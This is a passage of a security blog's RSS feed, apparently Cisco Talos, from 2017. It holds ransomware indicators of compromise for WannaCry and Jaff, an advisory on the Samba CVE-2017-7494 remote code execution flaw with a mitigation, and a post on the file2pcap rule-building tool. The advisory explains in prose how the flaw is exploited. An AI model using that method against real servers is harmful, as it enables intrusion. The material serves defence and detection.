/&gt;&lt;ul&gt;&lt;li&gt;b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25&lt;/li&gt;&lt;li&gt;24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c&lt;/li&gt;&lt;li&gt;4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982&lt;/li&gt;&lt;li&gt;4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79&lt;/li&gt;&lt;li&gt;1be0b96d502c268cb40da97a16952d89674a9329cb60bac81a96e01cf7356830&lt;/li&gt;&lt;li&gt;2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d&lt;/li&gt;&lt;li&gt;d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa&lt;/li&gt;&lt;li&gt;402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c&lt;/li&gt;&lt;li&gt;055c7760512c98c8d51e4427227fe2a7ea3b34ee63178fe78631fa8aa6d15622&lt;/li&gt;&lt;li&gt;e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b&lt;/li&gt;&lt;li&gt;97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/abZn6c42_GIrFkZYMNwtHIcMHfx62oUVgCEw/s1600/no-email-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1195" data-original-width="1600" height="238" src="https://2.bp.blogspot.com/-V6cub50HJ5A/WShYbcIEE6I/AAAAAAAABBY/abZn6c42_GIrFkZYMNwtHIcMHfx62oUVgCEw/s320/no-email-security.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-g9Gf-ZOTYoM/WShZ3H63zxI/AAAAAAAABCA/1KkrnTkMawsjgFbwbTVuCe7VHlCnSkd6ACLcB/s1600/Win_Ransomware_WannaCry_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="263" data-original-width="367" height="229" src="https://1.bp.blogspot.com/-g9Gf-ZOTYoM/WShZ3H63zxI/AAAAAAAABCA/1KkrnTkMawsjgFbwbTVuCe7VHlCnSkd6ACLcB/s320/Win_Ransomware_WannaCry_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-xeP4QeLANaA/WShZ8n7RznI/AAAAAAAABCE/ZtXUZ1XCD5ot8xKoCCtmjRDpqQ7i_eR2QCLcB/s1600/Win_Ransomware_WannaCry_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="394" data-original-width="1223" height="128" src="https://3.bp.blogspot.com/-xeP4QeLANaA/WShZ8n7RznI/AAAAAAAABCE/ZtXUZ1XCD5ot8xKoCCtmjRDpqQ7i_eR2QCLcB/s400/Win_Ransomware_WannaCry_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-cDuo4zpaP4Y/WRYwqS84LFI/AAAAAAAAA_4/Mjc4NrbR0XoKFcVGSlrNS_aiWGrvgAxxwCPcB/s1600/image8.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="976" data-original-width="1300" height="300" src="https://3.bp.blogspot.com/-cDuo4zpaP4Y/WRYwqS84LFI/AAAAAAAAA_4/Mjc4NrbR0XoKFcVGSlrNS_aiWGrvgAxxwCPcB/s400/image8.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Jaff&lt;/h3&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;84[.]242[.]240[.]62&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;panaceya-n[.]ru&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\TEMP\ratchet20.exe&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;03363f9f6938f430a58f3f417829aa3e98875703eb4c2ae12feccc07fff6ba47&lt;/li&gt;&lt;li&gt;d8bb054fa738d7ba1b88f65e2b7dcf40a234bec8ec318e472380b603ed9ba0dc&lt;/li&gt;&lt;li&gt;b9434c5fd5eefb8fb182024ecd3da4888222cae8a230fc0a778a7b712746f9f3&lt;/li&gt;&lt;li&gt;64580b7bb2eedf6e2d2f5e773b34a62f5065c4cb167cd4ed0791050f425c546e&lt;/li&gt;&lt;li&gt;8dbaab384ecd5386d960d1dddd7fd50ab3a30389dd5b8e516c5d873d77a1bbf9&lt;/li&gt;&lt;li&gt;aca726cb504599206e66823ff2863eb80c6a5f16ff71ca9fcdd907ad39b2d852&lt;/li&gt;&lt;li&gt;341267f4794a49e566c9697c77e974a99e41445cf41d8387040049ee1b8b2f3b&lt;/li&gt;&lt;li&gt;e081c4557f4153d2fc9102fabc55aa6acdf8e1e11062529c728f4506b0d981b9&lt;/li&gt;&lt;li&gt;5f1fcdfb951dc4642ce136a5d3e6bc42021f8e0cd631975a5eb3842da020531c&lt;/li&gt;&lt;li&gt;0746594fc3e49975d3d94bac8e80c0cdaa96d90ede3b271e6f372f55b20bac2f&lt;/li&gt;&lt;li&gt;f61d07cd7d32a6cb9ead8e82f43ef84cf54a89ef571d9b2a9cb0ecaf5319f5db&lt;/li&gt;&lt;li&gt;387812ee2820cbf49812b1b229b7d8721ee37296f7b6018332a56e30a99e1092&lt;/li&gt;&lt;li&gt;a0f72a7e67bfed40031c52a706b45de3787958729a308b5f15e754341022ed8e&lt;/li&gt;&lt;li&gt;6b5759c6c3d7c7c21859023b4fcc443aa5343759a7a08c3870c5269e5c34a958&lt;/li&gt;&lt;li&gt;94195aa110563ab1bd2542fb71806df5921c4c730036aa8faeaf537dcc01162c&lt;/li&gt;&lt;li&gt;2bc87f1bbfdb23fe503ef89bcbf6908ffd7218433e0fbfa51282c0dc51dece01&lt;/li&gt;&lt;li&gt;d1537972d7ac8f5f7c675c14027336715cb0bf91fe440d792e990d0efbd52710&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-tSS3VoI1eOo/WPEtzFghLhI/AAAAAAAAA2c/sELBUbsbhFAhWd_8GeacC_PrQGegGhZGQCLcB/s400/all.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-S5IWk9TNbiQ/WShaU6GpImI/AAAAAAAABCI/lftVS-4o1TUPByXLoQu81Rj6CnIL7ES7wCLcB/s1600/jaff_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="241" data-original-width="351" height="218" src="https://4.bp.blogspot.com/-S5IWk9TNbiQ/WShaU6GpImI/AAAAAAAABCI/lftVS-4o1TUPByXLoQu81Rj6CnIL7ES7wCLcB/s320/jaff_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-bFKeMZsCk8A/WShaX1nzwpI/AAAAAAAABCM/t0EVWxVaZHw9UgV-E1_Y9S11b0xZT_mwgCLcB/s1600/jaff_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="297" data-original-width="961" height="122" src="https://4.bp.blogspot.com/-bFKeMZsCk8A/WShaX1nzwpI/AAAAAAAABCM/t0EVWxVaZHw9UgV-E1_Y9S11b0xZT_mwgCLcB/s400/jaff_threatgrid.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-FM2j_idLbxg/WShacNICajI/AAAAAAAABCQ/1jUCAoJj424tNOVy3W4B9ioJAA1NfxvWgCLcB/s1600/jaff_investigate.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="333" data-original-width="827" height="160" src="https://1.bp.blogspot.com/-FM2j_idLbxg/WShacNICajI/AAAAAAAABCQ/1jUCAoJj424tNOVy3W4B9ioJAA1NfxvWgCLcB/s400/jaff_investigate.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-M5Mkzzbesqk/WShafnbWQJI/AAAAAAAABCU/nAp81DoPLy8eC5fMiftZvVRiyV9_kJ0hQCLcB/s1600/jaff_screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="737" data-original-width="1002" height="293" src="https://4.bp.blogspot.com/-M5Mkzzbesqk/WShafnbWQJI/AAAAAAAABCU/nAp81DoPLy8eC5fMiftZvVRiyV9_kJ0hQCLcB/s400/jaff_screenshot.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=ap40FDe81Ss:jIyh8_zuGiw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/ap40FDe81Ss" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-26T12:41:57.360-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s72-c/amp-tg-proxy-umbrella.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/threat-roundup-0519-0526.html</feedburner:origLink></item><item><title>Samba Vulnerability: Dancing Its Way to a Network Near You</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/f_tPlpkE8BQ/samba-vuln-details.html</link><category>samba</category><category>Talos</category><category>Vulnerability</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Thu, 25 May 2017 00:31:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-7582375314909239852</guid><description>&lt;h3&gt;Overview&lt;/h3&gt;&lt;div&gt;&lt;div&gt;Today, a new vulnerability affecting the widely used Samba software was released. Samba is the SMB/CIFS protocol commonly used in *NIX operating systems. &lt;a href="https://www.samba.org/samba/security/CVE-2017-7494.html"&gt;CVE-2017-7494&lt;/a&gt; has the potential to impact many systems around the world. This vulnerability could allow a user to upload a shared library to a writeable share on a vulnerable Samba server and result in the server executing the uploaded file. &amp;nbsp;This would allow an attacker to upload an exploit payload to a writeable Samba share, resulting in code execution on any server running an affected version of the Samba package. &amp;nbsp;This currently affects all versions of Samba 3.5.0 (released March of 2010) and later. To emphasize the severity and low complexity: a metasploit one-liner can be used to trigger this vulnerability.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A patch has already been released to address the issue. &amp;nbsp;Additionally, there is a mitigation available within the configuration of Samba itself. Adding the argument "nt pipe support = no" to the global section of the smb.conf file and restarting the service will also mitigate the threat. &amp;nbsp;This threat is only beginning to be recognized by potential attackers with POC code having already been released on the Internet. It is only a matter of time before adversaries begin to use it more widely to compromise additional systems, both externally and internally.&amp;nbsp;&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;This is likely to affect numerous servers, storage devices such as NAS systems, and anything else running the version of Samba that is vulnerable to this attack. Users are urged to contact their vendor to obtain patched firmware or recommendations for addressing this threat. In the meantime the above workaround may help. In accordance with best practices, it is highly recommended that users do not allow direct SMB, Samba, CIFS, NFS, etc. access from the Internet to systems within their network.&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;Coverage&lt;/h3&gt;&lt;div&gt;&lt;div&gt;Snort Rule: 43002-43004&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Additional ways our customers can detect and block this threat are listed below.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s1600/netsec-only.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1341" data-original-width="1600" height="335" src="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s400/netsec-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;Advanced Malware Protection (&lt;a href="https://www.cisco.com/c/en/us/support/security/amp-firepower-software-license/tsd-products-support-series-home.html"&gt;AMP&lt;/a&gt;) is ideally suited to prevent the execution of the malware used by these threat actors.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html"&gt;CWS&lt;/a&gt; or &lt;a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"&gt;WSA&lt;/a&gt; web scanning prevents access to malicious websites and detects malware used in these attacks.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Network Security appliances such as &lt;a href="https://www.cisco.com/c/en/us/products/security/asa-next-generation-firewall-services/index.html"&gt;NGFW&lt;/a&gt;, &lt;a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"&gt;NGIPS&lt;/a&gt;, and &lt;a href="https://meraki.cisco.com/products/appliances"&gt;Meraki MX&lt;/a&gt; can detect malicious activity associated with this threat.&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html"&gt;AMP Threat Grid&lt;/a&gt; helps identify malicious binaries and build protection into all Cisco Security products.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://umbrella.cisco.com/"&gt;Umbrella&lt;/a&gt; prevents DNS resolution of the domains associated with malicious activity.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="https://www.cisco.com/c/en/us/products/security/stealthwatch/index.html"&gt;Stealthwatch&lt;/a&gt; detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=f_tPlpkE8BQ:UmkdzmxxjDE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/f_tPlpkE8BQ" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-25T03:31:37.033-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-rJR6tslX9HE/WSYkb9psFtI/AAAAAAAABN4/mGX6C4EbJTsyp4ECD-pzdiaXl_ZbyZcWACLcB/s72-c/netsec-only.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/samba-vuln-details.html</feedburner:origLink></item><item><title>File2pcap - The Talos Swiss Army Knife of Snort Rule Creation</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/VdVLF8ZDTE4/file2pcap.html</link><category>file2pcap</category><category>Snort Rules</category><category>Talos</category><category>tcp/ip</category><category>threat intel tools</category><category>Threat Research</category><author>noreply@blogger.com (William Largent)</author><pubDate>Wed, 24 May 2017 09:02:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-7399830852917196724</guid><description>&lt;i&gt;This post was authored by Martin Zeiser with contributions by &lt;a href="https://twitter.com/JoelEsler" target="_blank"&gt;Joel Esler&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;At Talos we are constantly on the lookout for threats to our customers networks, and part of the protection process is creating Snort rules for the latest vulnerabilities in order to detect any attacks.&lt;br /&gt;&lt;br /&gt;To improve your understanding of the rule development process, consider a theoretical remotely exploitable vulnerability in server software Server2010. A proof-of-concept exploit is developed, the server software set up on a virtual machine, traffic is captured on &amp;nbsp;the network between attacker and victim, rule development can start, right?&lt;br /&gt;&lt;br /&gt;But what if months or years later, the rule needs to be re-inspected, because circumstances have changed? This requires another vulnerable version of Server2010 to be found, reinstalled and reconfigured to the vulnerable parameters, to run tests again and again, so that network traffic can be inspected. Then when the server is installed, the particular exploit used does not work anymore, because the language it was written in has since changed and the code needs to be fixed accordingly. All this requires plenty of time, which is why it doesn’t happen that way. Instead, a vulnerability is identified, an exploit is written, the exploit is ran, and the attack captured using Wireshark. From then on, the traffic in said pcap file can be used to develop a correct rule. The traffic recorded in a pcap file can easily be put back on the wire using a tcp replay utility, or read directly by Snort. This is why rule developers generally work with pcaps of attacks, instead of exploits.&lt;br /&gt;&lt;br /&gt;Regarding file-based vulnerabilities, the original process used to involve starting a local webserver and using a browser to download the exploit file, while recording the transfer using Wireshark. File2pcap revolutionized this requirement by simulating the traffic and creating the proper pcap without any hassles.&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Supported protocols:&lt;/h2&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP:&lt;/h4&gt;File2pcap started out as a tool to create pcaps from input files, showing these files in transfer from a web server to a browser. By simulating the entire data exchange it is possible to create a pcap file for any input file, usually within seconds. The result always shows a full TCP stream from SYN to FIN with packets in order and checksums correct. These pcap files can then be used in combination with a tcp replay tool (or read by Snort) to create proper rules for all file-based attacks.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP/2:&lt;/h4&gt;HTTP has evolved in the last number of years, with HTTP/2 now being in widespread use. It is typically used encrypted, but the protocol does also support plaintext connections, which is why HTTP/2 was added to file2pcap.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;HTTP POST:&lt;/h4&gt;Though HTTP GET is the prevalent request coming from a browser, sometimes data is uploaded using HTTP POST. To cover this angle, support for HTTP POST was added to file2pcap.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;SMTP/POP3/IMAP:&lt;/h4&gt;While browser-based attacks are one of the most common ways machines are compromised, another threat is email and attachments. In order to let Snort rule developers create pcaps for these threats just the way file2pcap allowed them for browser-based attacks, new features were added. Specifically support for the SMTP, POP3 and IMAP protocols. When file2pcap is instructed to craft an SMTP pcap from an input file, it simulates an email from a client to a mail server with the input file sent as an attachment to this email. POP3 and IMAP work similarly. Command-line switches allow for the encoding of the attachment to be switched from the default MIME to quoted-printable or even UU-encoding.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;FTP:&lt;/h4&gt;Another typical file transfer protocol which file2pcap supports is the FTP protocol, where both ‘active’ and ‘passive’ data streams can be created.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;IPv6:&lt;/h4&gt;To prepare file2pcap even better for covering any upcoming attacks, one of the latest additions was support for IPv6. Now a simple command-line flag can switch the data exchange from the default IPv4 to IPv6, while keeping everything else the same.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Talos GitHub&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;To wrap it up, file2pcap is a tool which will create a pcap from any input file, simulating this file in transit, using various protocols and encodings. The resulting pcap file can then be used to create or test rules for Snort. File2pcap is in widespread use within Talos for rule creation, as it works reliably while saving plenty of development time.&lt;br /&gt;&lt;br /&gt;File2pcap can be downloaded from our &lt;a href="https://github.com/Cisco-Talos/file2pcap/releases/tag/1.25" target="_blank"&gt;Github page&lt;/a&gt;&lt;br /&gt;Feedback and feature requests are welcome on our &lt;a href="https://github.com/Cisco-Talos/file2pcap/issues" target="_blank"&gt;Github Issues Page&lt;/a&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=VdVLF8ZDTE4:nNUgXtpeYg4:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/VdVLF8ZDTE4" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-05-24T12:02:19.874-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/05/file2pcap.html</feedburner:origLink></item></channel></rss>
